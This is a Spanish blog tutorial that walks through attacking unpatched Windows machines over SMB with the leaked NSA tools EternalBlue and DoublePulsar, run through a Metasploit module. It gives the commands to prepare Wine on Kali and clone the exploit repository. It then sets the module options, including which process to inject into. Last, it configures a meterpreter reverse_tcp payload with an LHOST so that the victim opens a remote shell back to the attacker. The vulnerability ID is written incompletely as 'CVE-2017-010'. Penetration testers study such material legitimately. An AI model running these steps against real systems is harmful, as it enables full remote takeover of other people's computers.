PoC: Explotando CVE-2017-010 con Eternalblue y Doublepulsar desde Metasploit

Hace algunos meses se filtró un leak con un arsenal de exploits y herramientas usadas por la NSA. Dicho arsenal incluía entre otras utilidades una serie de herramientas para explotar la vulnerabilidad CVE-2017-010 que afecta a SMB y que no fue parcheada hasta marzo por Microsoft, lo que hace que aún existan muchos equipos vulnerables y la convierte en potencialmente peligrosa.

Es muy importante, si eres administrador de sistemas o usuario final que instales las últimas actualizaciones de Windows para protegerte de estas vulnerabilidades ya que permiten el control remoto total del equipo vulnerable.

Estos exploits se utilizan bajo el propio framework de la NSA, que también se filtró y que tiene como requisitos un equipo Windows con ciertas configuraciones añadidas. Estas peculiaridades unido a que la mayoría de pentesters no estamos familiarizados con dicho framework dan como resultado que no sea una práctica cómoda a pesar de su potencial.

Ahora, la gente de ElevenPaths (@UnaPibaGeek y @pablogonzalezpe) han desarrollado un módulo de Metasploit que permite la ejecución de estos exploits en equipos Linux a través de Metasploit.

Preparar el entorno

Si usas Kali Linux x64 vendrá preparado para usar Wine64, así que el primer paso es configurarlo para que funcione con binarios de 32bits. Aunque este tipo de configuraciones se salen de la temática del blog en mi caso bastó con unos pocos comandos:

1
2
3
4
5
dpkg --add-architecture i386 && apt-get update
apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

Descargarmos el repositorio del exploit

1
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Y movemos el contenido dentro de la carpeta de exploits de metasploit. En mi caso lo dejaré en /usr/share/metasploit-framework/modules/exploits/windows/smb

Explotando CVE-2017-010

Como viene siendo habitual, cargaremos metasploit y, en este caso, el exploit con  use exploit/windows/smb/eternalblue_doublepulsar a continuación veremos y explicaremos los diferentes parámetros a configurar con show options:
Los parámetros DOUBLEPULSARPATH y ETERNALBLUEPATH corresponden, como su nombre indica al la ruta donde se encuentran dichos exploits. En nuestro caso como movimos el exploit en  /usr/share/metasploit-framework/modules/exploits/windows/smb la ruta será /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
El parámetro PROCESSINJECT dependerá de si el equipo víctima es 32 o 64 bits. En los equipos 64bits debemos establecer lsass.exe y en los equipos con 32bits debe ser wlms.exe.
El parámetro TARGETARCHITECTURE puede ser x86 o x64, dependiendo obviamente del equipo víctima.
Por último tenemos que establecer en el TARGET la versión de Windows a explotar y el RHOST con la IP de la máquina vulnerable.



A continuación, como es habitual, establecemos nuestro payload favorito, en este caso meterpreter:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Destacar que al estar atacando un equipo 64bits usamos la versión 64bits de meterpreter. En equipos de 32bits usaremos windows/meterpreter/reverse_tcp
Y lo configuramos estableciendo nuestra IP:

set LHOST 11.11.11.129

Ahora solo nos queda lanzar el exploit y esperar la Shell.
Seguir en twitter: @disoftin

Publicar un comentario

0 Comentarios